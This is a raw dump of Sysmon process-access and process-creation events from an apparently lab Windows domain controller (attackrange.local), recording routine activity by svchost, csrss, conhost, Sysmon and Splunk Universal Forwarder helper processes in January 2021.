service 10341000x800000000000000013888Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:18.844{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-494A-6000-7505-000000009A01}6588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013887Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:18.844{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013886Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:18.844{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013885Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:18.844{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013884Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:18.844{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013883Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:18.844{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-494A-6000-7505-000000009A01}6588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013882Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:18.844{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-494A-6000-7505-000000009A01}6588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013881Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:18.845{08A6967A-494A-6000-7505-000000009A01}6588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013880Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:18.329{08A6967A-494A-6000-7405-000000009A01}63246648C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013879Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:18.172{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-494A-6000-7405-000000009A01}6324C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013878Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:18.172{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013877Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:18.172{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013876Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:18.172{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013875Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:18.172{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013874Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:18.172{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-494A-6000-7405-000000009A01}6324C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013873Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:18.172{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-494A-6000-7405-000000009A01}6324C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013872Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:18.173{08A6967A-494A-6000-7405-000000009A01}6324C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013897Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:19.985{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-494B-6000-7605-000000009A01}6308C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013896Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:19.985{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013895Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:19.985{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013894Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:19.985{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013893Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:19.985{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013892Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:19.985{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-494B-6000-7605-000000009A01}6308C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013891Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:19.985{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-494B-6000-7605-000000009A01}6308C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013890Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:19.985{08A6967A-494B-6000-7605-000000009A01}6308C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013889Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:19.000{08A6967A-494A-6000-7505-000000009A01}65886608C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013899Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:46.938{08A6967A-4288-6000-0D00-000000009A01}6124916C:\Windows\system32\svchost.exe{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013898Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:46.938{08A6967A-4288-6000-0D00-000000009A01}6122720C:\Windows\system32\svchost.exe{08A6967A-4780-6000-3905-000000009A01}6868C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013900Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:09.922{08A6967A-4288-6000-0D00-000000009A01}6124916C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013902Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:12.375{08A6967A-4753-6000-0D05-000000009A01}11165564C:\Windows\System32\RuntimeBroker.exe{08A6967A-4753-6000-0F05-000000009A01}1084C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\TokenBroker.dll+1acfa|C:\Windows\System32\TokenBroker.dll+1d475|C:\Windows\System32\TokenBroker.dll+1d7f9|C:\Windows\System32\TokenBroker.dll+1e8f3|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5fc83|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+5086c